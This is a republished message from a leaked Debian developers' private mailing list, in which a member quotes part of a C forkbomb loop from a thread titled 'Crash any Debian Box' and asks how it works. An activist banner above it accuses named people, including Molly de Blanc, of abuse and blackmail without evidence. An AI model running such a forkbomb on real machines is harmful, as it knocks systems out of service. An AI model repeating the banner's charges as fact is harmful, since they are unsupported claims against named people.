The debian-private mailing list leak, part 1. Volunteers have complained about Blackmail. Lynchings. Character assassination. Defamation. Cyberbullying. Volunteers who gave many years of their lives are picked out at random for cruel social experiments. The former DPL's girlfriend Molly de Blanc is given volunteers to experiment on for her crazy talks. These volunteers never consented to be used like lab rats. We don't either. debian-private can no longer be a safe space for the cabal. Let these monsters have nowhere to hide. Volunteers are not disposable. We stand with the victims.

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Crash any Debian Box



Tom Gallagher writes:
> /* forkbomb by killspree */
> ...
>    for(;;)
>     {
>       if (!fork())
>          setpgrp();
>       malloc((size_t)1);
>       malloc((size_t)10);
>       malloc((size_t)100);
>       malloc((size_t)1000);
>       malloc((size_t)10000);
>       malloc((size_t)100000);
>       malloc((size_t)1000000);
>     }
> }

Could anyone tell me what all these mallocs are for? Don't you have to
access the memory to really allocate it in virtual memory? Also a forkbomb
doesn't need that. It just forks long enough to fill the process table. But
that shouldn't prevent root from working as root has it's own reserved table
space.

Tom, what exactly happened with your system? I cannot check it myself on our
company's server for obvious reasons. Did you get an error message? 

Michael
-- 
Dr. Michael Meskes, Project-Manager    | topsystem Systemhaus GmbH
meskes@topsystem.de                    | Europark A2, Adenauerstr. 20
meskes@debian.org                      | 52146 Wuerselen
Go SF49ers! Go Rhein Fire!             | Tel: (+49) 2405/4670-44
Use Debian GNU/Linux!                  | Fax: (+49) 2405/4670-10


--
TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word "unsubscribe" to
debian-private-request@lists.debian.org . 
Trouble?  e-mail to templin@bucknell.edu .